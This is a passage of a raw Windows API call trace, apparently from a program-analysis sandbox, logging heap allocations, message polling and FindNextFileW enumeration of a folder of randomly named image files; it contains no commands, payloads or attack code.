(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0247.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0247.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0247.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0247.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0247.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0247.241] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0247.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0247.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0247.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0247.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0247.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0247.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d18 [0247.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0247.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0247.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0247.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0247.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d18 | out: hHeap=0x970000) returned 1 [0247.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0247.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0247.242] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0247.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0247.242] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0247.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0247.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0247.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0247.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0247.242] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21ffad60, ftCreationTime.dwHighDateTime=0x1d5ebe5, ftLastAccessTime.dwLowDateTime=0x78d18b70, ftLastAccessTime.dwHighDateTime=0x1d5f056, ftLastWriteTime.dwLowDateTime=0x78d18b70, ftLastWriteTime.dwHighDateTime=0x1d5f056, nFileSizeHigh=0x0, nFileSizeLow=0x6f77, dwReserved0=0x0, dwReserved1=0x0, cFileName="MYUszCBAPCzmXXDSG.png", cAlternateFileName="MYUSZC~1.PNG")) returned 1 [0247.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0247.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55df8 [0247.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0247.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0247.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0247.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0247.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0247.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0247.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0247.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0247.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0247.242] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0247.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0247.242] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0247.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0247.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0247.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0247.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0247.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0247.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0247.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0247.243] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0247.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0247.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0247.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0247.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0247.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0247.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e30 [0247.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0247.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0247.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0247.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0247.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x180) returned 0x978538 [0247.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0247.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0247.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0247.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0247.243] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0247.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0247.243] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0247.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0247.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0247.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0247.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0247.244] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde4ae4c0, ftCreationTime.dwHighDateTime=0x1d5e650, ftLastAccessTime.dwLowDateTime=0xfdbc4c60, ftLastAccessTime.dwHighDateTime=0x1d5e298, ftLastWriteTime.dwLowDateTime=0xfdbc4c60, ftLastWriteTime.dwHighDateTime=0x1d5e298, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nbgymYtNQPEv_vy2", cAlternateFileName="NBGYMY~1")) returned 1 [0247.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0247.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a08 [0247.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0247.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0247.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0247.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0247.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55df8 | out: hHeap=0x970000) returned 1 [0247.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0247.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0247.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0247.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0247.244] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0247.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0247.244] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0247.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0247.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0247.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0247.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0247.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0247.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0247.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0247.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0247.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c68 [0247.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509c8 [0247.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0247.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0247.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0247.245] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.245] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.245] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8cfc050, ftCreationTime.dwHighDateTime=0x1d5ee65, ftLastAccessTime.dwLowDateTime=0x3c2b4290, ftLastAccessTime.dwHighDateTime=0x1d5e80b, ftLastWriteTime.dwLowDateTime=0x3c2b4290, ftLastWriteTime.dwHighDateTime=0x1d5e80b, nFileSizeHigh=0x0, nFileSizeLow=0xc4dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ndo_wHdmDfLw8EHAJ.bmp", cAlternateFileName="NDO_WH~1.BMP")) returned 1 [0247.245] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.245] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.245] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.245] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.245] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.246] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf6c49a0, ftCreationTime.dwHighDateTime=0x1d5e0c6, ftLastAccessTime.dwLowDateTime=0x5992d230, ftLastAccessTime.dwHighDateTime=0x1d5e4dc, ftLastWriteTime.dwLowDateTime=0x5992d230, ftLastWriteTime.dwHighDateTime=0x1d5e4dc, nFileSizeHigh=0x0, nFileSizeLow=0x11ef3, dwReserved0=0x0, dwReserved1=0x0, cFileName="NU6pYHrnfbris-w219Y.png", cAlternateFileName="NU6PYH~1.PNG")) returned 1 [0247.246] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.246] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.246] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.246] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.246] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.246] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5ef4830, ftCreationTime.dwHighDateTime=0x1d5f07f, ftLastAccessTime.dwLowDateTime=0xeef15e10, ftLastAccessTime.dwHighDateTime=0x1d5ec42, ftLastWriteTime.dwLowDateTime=0xeef15e10, ftLastWriteTime.dwHighDateTime=0x1d5ec42, nFileSizeHigh=0x0, nFileSizeLow=0xb42a, dwReserved0=0x0, dwReserved1=0x0, cFileName="q0Ayv.png", cAlternateFileName="")) returned 1 [0247.246] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.246] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.246] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.246] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.247] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.247] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Saved Pictures", cAlternateFileName="SAVEDP~1")) returned 1 [0247.247] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.247] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.247] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.247] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.247] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0d8da40, ftCreationTime.dwHighDateTime=0x1d5eaf2, ftLastAccessTime.dwLowDateTime=0xa8a18d0, ftLastAccessTime.dwHighDateTime=0x1d5e37c, ftLastWriteTime.dwLowDateTime=0xa8a18d0, ftLastWriteTime.dwHighDateTime=0x1d5e37c, nFileSizeHigh=0x0, nFileSizeLow=0x14f18, dwReserved0=0x0, dwReserved1=0x0, cFileName="SWfcb.jpg", cAlternateFileName="")) returned 1 [0247.248] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.248] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.248] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.248] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.248] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.248] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2355fcc0, ftCreationTime.dwHighDateTime=0x1d5f052, ftLastAccessTime.dwLowDateTime=0x691d95a0, ftLastAccessTime.dwHighDateTime=0x1d5eedc, ftLastWriteTime.dwLowDateTime=0x691d95a0, ftLastWriteTime.dwHighDateTime=0x1d5eedc, nFileSizeHigh=0x0, nFileSizeLow=0x577, dwReserved0=0x0, dwReserved1=0x0, cFileName="T9bmRc0wgjLMG_.jpg", cAlternateFileName="T9BMRC~1.JPG")) returned 1 [0247.248] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.248] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.248] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.248] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.248] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.248] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4f56ed0, ftCreationTime.dwHighDateTime=0x1d5e570, ftLastAccessTime.dwLowDateTime=0xf735c220, ftLastAccessTime.dwHighDateTime=0x1d5eee3, ftLastWriteTime.dwLowDateTime=0xf735c220, ftLastWriteTime.dwHighDateTime=0x1d5eee3, nFileSizeHigh=0x0, nFileSizeLow=0x13182, dwReserved0=0x0, dwReserved1=0x0, cFileName="TbPkae.gif", cAlternateFileName="")) returned 1 [0247.249] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.249] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.249] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.249] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.249] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.249] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5679540, ftCreationTime.dwHighDateTime=0x1d5f06b, ftLastAccessTime.dwLowDateTime=0x44781320, ftLastAccessTime.dwHighDateTime=0x1d5ec01, ftLastWriteTime.dwLowDateTime=0x44781320, ftLastWriteTime.dwHighDateTime=0x1d5ec01, nFileSizeHigh=0x0, nFileSizeLow=0x3ad6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Th2s_hnP9cJx5.bmp", cAlternateFileName="TH2S_H~1.BMP")) returned 1 [0247.249] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.249] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.249] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.249] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.250] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.250] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x347e7710, ftCreationTime.dwHighDateTime=0x1d5ef90, ftLastAccessTime.dwLowDateTime=0x6cb0f210, ftLastAccessTime.dwHighDateTime=0x1d5f03b, ftLastWriteTime.dwLowDateTime=0x6cb0f210, ftLastWriteTime.dwHighDateTime=0x1d5f03b, nFileSizeHigh=0x0, nFileSizeLow=0xc6f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="thpKc0ZlnbdGnIRJzL.gif", cAlternateFileName="THPKC0~1.GIF")) returned 1 [0247.250] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.250] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.250] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.250] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, 